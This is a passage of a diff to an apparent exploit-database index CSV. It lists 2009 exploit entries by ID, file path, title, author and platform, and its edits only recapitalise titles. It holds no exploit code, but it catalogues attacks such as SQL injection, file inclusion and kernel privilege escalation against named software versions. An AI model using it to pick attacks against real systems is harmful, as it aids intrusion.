7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0 7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 -7955,platforms/php/webapps/7955.txt,"groone's guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 +7955,platforms/php/webapps/7955.txt,"groone's GuestBook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0 7957,platforms/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - (.torrent) Buffer Overflow Exploit",2009-02-03,SkD,windows,local,0 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - (.pls) Local Buffer Overflow",2009-02-03,h4ck3r#47,windows,local,0 @@ -7518,7 +7518,7 @@ id,file,description,date,author,platform,type,port 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (xp)",2009-02-04,"Rob Carter",windows,remote,0 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (vista)",2009-02-04,"Rob Carter",windows,remote,0 7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC - Multiple VNC Clients Multiple Integer Overflow PoC",2009-02-04,"Andres Luksenberg",windows,dos,0 -7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 +7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - (.pls) Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0 @@ -7616,7 +7616,7 @@ id,file,description,date,author,platform,type,port 8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection Exploit",2009-02-20,Osirys,php,webapps,0 8090,platforms/windows/dos/8090.txt,"Multiple PDF Readers - JBIG2 Local Buffer Overflow PoC",2009-02-23,webDEViL,windows,dos,0 8091,platforms/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - (BODY onload) Remote Crash Exploit",2009-02-23,Skylined,multiple,dos,0 -8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' No Authentication",2009-02-23,ahmadbady,php,webapps,0 +8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Pre-Authentication",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - (notes.php id) Remote Command Execution Exploit",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 8095,platforms/php/webapps/8095.pl,"Pyrophobia 2.1.3.1 - Local File Inclusion Command Execution Exploit",2009-02-23,Osirys,php,webapps,0 @@ -7631,7 +7631,7 @@ id,file,description,date,author,platform,type,port 8105,platforms/php/webapps/8105.txt,"ppim 1.0 - Multiple Vulnerabilities",2009-02-25,"Justin Keane",php,webapps,0 8106,platforms/hardware/dos/8106.txt,"Netgear WGR614v9 - Wireless Router Get Request Denial of Service",2009-02-25,staticrez,hardware,dos,0 8107,platforms/asp/webapps/8107.txt,"PenPal 2.0 - (Authentication Bypass) SQL Injection",2009-02-25,ByALBAYX,asp,webapps,0 -8108,platforms/osx/local/8108.c,"Apple MACOS X xnu 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 +8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure Exploit",2009-02-25,mu-b,osx,local,0 8109,platforms/asp/webapps/8109.txt,"SkyPortal Classifieds System 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8110,platforms/asp/webapps/8110.txt,"SkyPortal Picture Manager 0.11 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 8111,platforms/asp/webapps/8111.txt,"SkyPortal WebLinks 0.12 - Contents Change",2009-02-25,ByALBAYX,asp,webapps,0 @@ -7711,7 +7711,7 @@ id,file,description,date,author,platform,type,port 8193,platforms/windows/local/8193.py,"RainbowPlayer 0.91 - (playlist) Universal SEH Overwrite",2009-03-10,His0k4,windows,local,0 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - (course_id) SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0 8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0 -8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0 +8196,platforms/php/webapps/8196.txt,"Wordpress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0 8197,platforms/php/webapps/8197.txt,"Joomla Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0 8200,platforms/windows/remote/8200.pl,"GuildFTPd FTP Server 0.999.14 - Remote Delete Files Exploit",2009-03-10,"Jonathan Salwan",windows,remote,0 @@ -7739,7 +7739,7 @@ id,file,description,date,author,platform,type,port 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0 8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow (SEH)",2009-03-17,LiquidWorm,windows,remote,0 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) SQL Injection",2009-03-17,g4t3w4y,php,webapps,0 -8229,platforms/php/webapps/8229.txt,"WordPress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 +8229,platforms/php/webapps/8229.txt,"Wordpress Plugin fMoblog 2.1 - 'id' SQL Injection",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion",2009-03-17,Garry,php,webapps,0 8231,platforms/windows/local/8231.php,"CDex 1.70b2 - (.ogg) Local Buffer Overflow (xp/ sp3)",2009-03-18,Nine:Situations:Group,windows,local,0 8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 @@ -7772,11 +7772,11 @@ id,file,description,date,author,platform,type,port 8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router - Remote Denial of Service",2009-03-23,Benkei,hardware,dos,0 8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - (ktimer) Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 -8262,platforms/osx/dos/8262.c,"Mac OS X xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 -8263,platforms/osx/dos/8263.c,"Mac OS X xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 -8264,platforms/osx/dos/8264.c,"Mac OS X xnu 1228.3.13 - (profil) Kernel Memory Leak/Denial of Service PoC",2009-03-23,mu-b,osx,dos,0 -8265,platforms/osx/dos/8265.c,"Mac OS X xnu 1228.x - (vfssysctl) Local Kernel Denial of Service PoC",2009-03-23,mu-b,osx,dos,0 -8266,platforms/osx/local/8266.txt,"Mac OS X xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 +8262,platforms/osx/dos/8262.c,"Mac OSX xnu 1228.3.13 - (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 +8263,platforms/osx/dos/8263.c,"Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service",2009-03-23,mu-b,osx,dos,0 +8264,platforms/osx/dos/8264.c,"Mac OSX xnu 1228.3.13 - (profil) Kernel Memory Leak/Denial of Service PoC",2009-03-23,mu-b,osx,dos,0 +8265,platforms/osx/dos/8265.c,"Mac OSX xnu 1228.x - (vfssysctl) Local Kernel Denial of Service PoC",2009-03-23,mu-b,osx,dos,0 +8266,platforms/osx/local/8266.txt,"Mac OSX xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - (.pls) Universal Seh Overwrite",2009-03-23,His0k4,windows,local,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 @@ -7847,7 +7847,7 @@ id,file,description,date,author,platform,type,port 8335,platforms/windows/dos/8335.c,"DeepBurner 1.9.0.228 - Stack Buffer Overflow (SEH) PoC",2009-04-01,"fl0 fl0w",windows,dos,0 8336,platforms/windows/remote/8336.pl,"Oracle WebLogic IIS connector JSESSIONID - Remote Overflow",2009-04-01,"Guido Landi",windows,remote,0 8337,platforms/multiple/dos/8337.c,"XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow PoC",2009-04-01,n00b,multiple,dos,0 -8338,platforms/windows/remote/8338.py,"XBMC 8.10 - (GET Request) Remote Buffer Overflow (Windows)",2009-04-01,n00b,windows,remote,80 +8338,platforms/windows/remote/8338.py,"XBMC 8.10 (Windows) - (GET Request) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8339,platforms/windows/remote/8339.py,"XBMC 8.10 - (takescreenshot) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8340,platforms/windows/remote/8340.py,"XBMC 8.10 - (get tag from file name) Remote Buffer Overflow",2009-04-01,n00b,windows,remote,80 8341,platforms/php/webapps/8341.txt,"MyioSoft Ajax Portal 3.0 - (page) SQL Injection",2009-04-01,cOndemned,php,webapps,0 @@ -7885,7 +7885,7 @@ id,file,description,date,author,platform,type,port 8373,platforms/php/webapps/8373.txt,"Xplode CMS - (wrap_script) SQL Injection",2009-04-08,PLATEN,php,webapps,0 8374,platforms/php/webapps/8374.txt,"WebFileExplorer 3.1 - (DB.MDB) Database Disclosure",2009-04-08,ByALBAYX,php,webapps,0 8376,platforms/php/webapps/8376.php,"Geeklog 1.5.2 - SEC_authenticate() SQL Injection",2009-04-09,Nine:Situations:Group,php,webapps,0 -8377,platforms/asp/webapps/8377.pl,"Exjune Guestbook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 +8377,platforms/asp/webapps/8377.pl,"Exjune GuestBook 2.0 - Remote Database Disclosure Exploit",2009-04-09,AlpHaNiX,asp,webapps,0 8378,platforms/windows/dos/8378.pl,"SWF Opener 1.3 - (.swf) Off By One Buffer Overflow PoC",2009-04-09,Stack,windows,dos,0 8379,platforms/asp/webapps/8379.txt,"BackendCMS 5.0 - (main.asp id) SQL Injection",2009-04-09,AnGeL25dZ,asp,webapps,0 8380,platforms/php/webapps/8380.txt,"Simbas CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 @@ -7894,7 +7894,7 @@ id,file,description,date,author,platform,type,port 8384,platforms/linux/remote/8384.txt,"net2ftp 0.97 - Cross-Site Scripting / Request Forgery",2009-04-09,cicatriz,linux,remote,0 8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 -8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 +8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0 8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 8390,platforms/windows/dos/8390.cpp,"Xilisoft Video Converter Wizard 3 - (.cue) Stack Buffer Overflow PoC",2009-04-10,"fl0 fl0w",windows,dos,0 @@ -7981,7 +7981,7 @@ id,file,description,date,author,platform,type,port 8472,platforms/php/webapps/8472.txt,"ClanTiger 1.1.1 - (Authentication Bypass) SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8473,platforms/php/webapps/8473.pl,"ClanTiger 1.1.1 - (slug) Blind SQL Injection",2009-04-17,YEnH4ckEr,php,webapps,0 8474,platforms/php/webapps/8474.txt,"e-cart.biz Shopping Cart - Arbitrary File Upload",2009-04-17,ahmadbady,php,webapps,0 -8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 +8475,platforms/php/webapps/8475.txt,"Online GuestBook Pro - (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0 8476,platforms/php/webapps/8476.txt,"Online Email Manager - Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Authentication Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0 8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1)",2009-04-20,kingcope,linux,local,0 @@ -8046,7 +8046,7 @@ id,file,description,date,author,platform,type,port 8538,platforms/php/webapps/8538.txt,"Invision Power Board 3.0.0b5 - Active Cross-Site Scripting / Full Path Disclosure",2009-04-27,brain[pillow],php,webapps,0 8539,platforms/php/webapps/8539.txt,"Opencart 1.1.8 - (route) Local File Inclusion",2009-04-27,OoN_Boy,php,webapps,0 8540,platforms/windows/local/8540.c,"SDP Downloader 2.3.0 - (.ASX) Local Buffer Overflow (SEH) (2)",2009-04-27,SimO-s0fT,windows,local,0 -8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (seh)",2009-04-27,Nine:Situations:Group,windows,local,0 +8541,platforms/windows/local/8541.php,"Zoom Player Pro 3.30 - '.m3u' File Buffer Overflow (SEH)",2009-04-27,Nine:Situations:Group,windows,local,0 8542,platforms/windows/dos/8542.php,"Icewarp Merak Mail Server 9.4.1 - Base64FileEncode() Buffer Overflow PoC",2009-04-27,Nine:Situations:Group,windows,dos,0 8543,platforms/php/webapps/8543.php,"LightBlog 9.9.2 - (register.php) Remote Code Execution Exploit",2009-04-27,EgiX,php,webapps,0 8544,platforms/linux/dos/8544.pl,"iodined 0.4.2-2 - (forged DNS packet) Denial of Service",2009-04-27,"Albert Sellares",linux,dos,0 @@ -8064,7 +8064,7 @@ id,file,description,date,author,platform,type,port 8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.20 / 2.6.24 / 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,php,webapps,0 -8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0 +8559,platforms/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure Exploit (C)",2009-04-28,StAkeR,php,webapps,0 8560,platforms/windows/remote/8560.html,"Autodesk IDrop - ActiveX Remote Code Execution Exploit",2009-04-28,Elazar,windows,remote,0 8561,platforms/windows/remote/8561.pl,"Quick 'n Easy Web Server 3.3.5 - Arbitrary File Disclosure Exploit",2009-04-28,Cyber-Zone,windows,remote,0 8562,platforms/windows/remote/8562.html,"Symantec Fax Viewer Control 10 - (DCCFAXVW.DLL) Remote Buffer Overflow Exploit",2009-04-29,Nine:Situations:Group,windows,remote,0 @@ -8099,7 +8099,7 @@ id,file,description,date,author,platform,type,port 8593,platforms/php/webapps/8593.txt,"pecio CMS 1.1.5 - (index.php language) Local File Inclusion",2009-05-01,SirGod,php,webapps,0 8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi) Universal Local Buffer Overflow",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 < 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 -8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 +8596,platforms/asp/webapps/8596.pl,"Winn ASP GuestBook 1.01b - Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 - Insecure Cookie Handling",2009-05-04,Mr.tro0oqy,php,webapps,0 @@ -8214,7 +8214,7 @@ id,file,description,date,author,platform,type,port 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 8712,platforms/windows/dos/8712.txt,"httpdx 0.5b - Multiple Remote Denial of Service Vulnerabilities",2009-05-18,sico2819,windows,dos,0 -8713,platforms/php/webapps/8713.txt,"coppermine photo gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 +8713,platforms/php/webapps/8713.txt,"coppermine photo Gallery 1.4.22 - Multiple Vulnerabilities",2009-05-18,girex,php,webapps,0 8714,platforms/php/webapps/8714.txt,"Flyspeck CMS 6.8 - Local/Remote File Inclusion / Change Add Admin Exploit",2009-05-18,ahmadbady,php,webapps,0 8715,platforms/php/webapps/8715.txt,"Pluck 4.6.2 - (langpref) Local File Inclusion",2009-05-18,ahmadbady,php,webapps,0 8716,platforms/windows/remote/8716.py,"httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow Exploit (SEH)",2009-05-18,His0k4,windows,remote,21 @@ -8252,10 +8252,10 @@ id,file,description,date,author,platform,type,port 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher - Arbitrary Authentication Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0 -8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 +8753,platforms/osx/remote/8753.txt,"Mac OSX - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 -8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 +8756,platforms/asp/webapps/8756.txt,"asp inline corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8757,platforms/windows/remote/8757.html,"BaoFeng - (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8758,platforms/windows/remote/8758.html,"ChinaGames - (CGAgent.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0 @@ -8288,7 +8288,7 @@ id,file,description,date,author,platform,type,port 8788,platforms/php/webapps/8788.txt,"Mole Adult Portal Script - (profile.php user_id) SQL Injection",2009-05-26,Qabandi,php,webapps,0 8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0 -8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 +8791,platforms/php/webapps/8791.txt,"Wordpress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion",2009-05-26,asL-Sabia,php,webapps,0 8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Authentication Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox - (unclamped loop) Denial of Service",2009-05-26,"Thierry Zoller",multiple,dos,0 @@ -8296,7 +8296,7 @@ id,file,description,date,author,platform,type,port 8796,platforms/php/webapps/8796.htm,"Gallarific - (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0 8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8798,platforms/windows/dos/8798.rb,"Safari - RSS feed:// Buffer Overflow via libxml2 Exploit (PoC)",2009-05-26,"Kevin Finisterre",windows,dos,0 -8799,platforms/windows/local/8799.txt,"PHP 5.2.9 - Local Safemod Bypass Exploit (Win32)",2009-05-26,Abysssec,windows,local,0 +8799,platforms/windows/local/8799.txt,"PHP 5.2.9 (Windows/x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,windows,local,0 8801,platforms/php/webapps/8801.txt,"Joomla Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,php,webapps,0 8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - (Authentication Bypass) SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 @@ -8319,10 +8319,10 @@ id,file,description,date,author,platform,type,port 8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 -8823,platforms/php/webapps/8823.txt,"Webboard 2.90 beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 +8823,platforms/php/webapps/8823.txt,"WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 8824,platforms/windows/remote/8824.html,"Roxio CinePlayer 3.2 - (SonicMediaPlayer.dll) Remote Buffer Overflow Exploit",2009-05-29,snakespc,windows,remote,0 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 -8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 - Stack Overflow Crash PoC (osx/win)",2009-05-29,"Saint Patrick",multiple,dos,0 +8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash PoC",2009-05-29,"Saint Patrick",multiple,dos,0 8827,platforms/php/webapps/8827.txt,"ecshop 2.6.2 - Multiple Remote Command Execution Vulnerabilities",2009-05-29,Securitylab.ir,php,webapps,0 8828,platforms/php/webapps/8828.txt,"Arab Portal 2.2 - (Authentication Bypass) SQL Injection",2009-05-29,"sniper code",php,webapps,0 8829,platforms/php/webapps/8829.txt,"ZeusCart 2.3 - (maincatid) SQL Injection",2009-05-29,Br0ly,php,webapps,0 @@ -8389,7 +8389,7 @@ id,file,description,date,author,platform,type,port 8893,platforms/php/webapps/8893.txt,"Virtue Book Store - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8894,platforms/php/webapps/8894.txt,"Virtue Shopping Mall - 'cid' SQL Injection",2009-06-08,OzX,php,webapps,0 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 -8896,platforms/osx/local/8896.c,"Apple MACOS X xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 +8896,platforms/osx/local/8896.c,"Apple Mac OSX xnu 1228.9.59 - Kernel Privilege Escalation",2009-06-08,mu-b,osx,local,0 8897,platforms/windows/remote/8897.c,"httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit",2009-06-08,"Jonathan Salwan",windows,remote,0 8898,platforms/php/webapps/8898.txt,"Joomla Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0 8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow PoC",2009-06-08,DSecRG,windows,dos,0 @@ -8425,7 +8425,7 @@ id,file,description,date,author,platform,type,port 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 8933,platforms/php/webapps/8933.php,"Sniggabo CMS - (article.php id) SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0 -8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 - (itms/itcp) Remote Buffer Overflow (Windows)",2009-06-12,ryujin,windows,remote,0 +8934,platforms/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - (itms/itcp) Remote Buffer Overflow",2009-06-12,ryujin,windows,remote,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 @@ -8451,7 +8451,7 @@ id,file,description,date,author,platform,type,port 8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla Component com_ijoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash Exploit",2009-06-15,webDEViL,linux,dos,0 -8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0 +8961,platforms/php/webapps/8961.txt,"Wordpress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0 8962,platforms/php/webapps/8962.txt,"phpCollegeExchange 0.1.5c - (listing_view.php itemnr) SQL 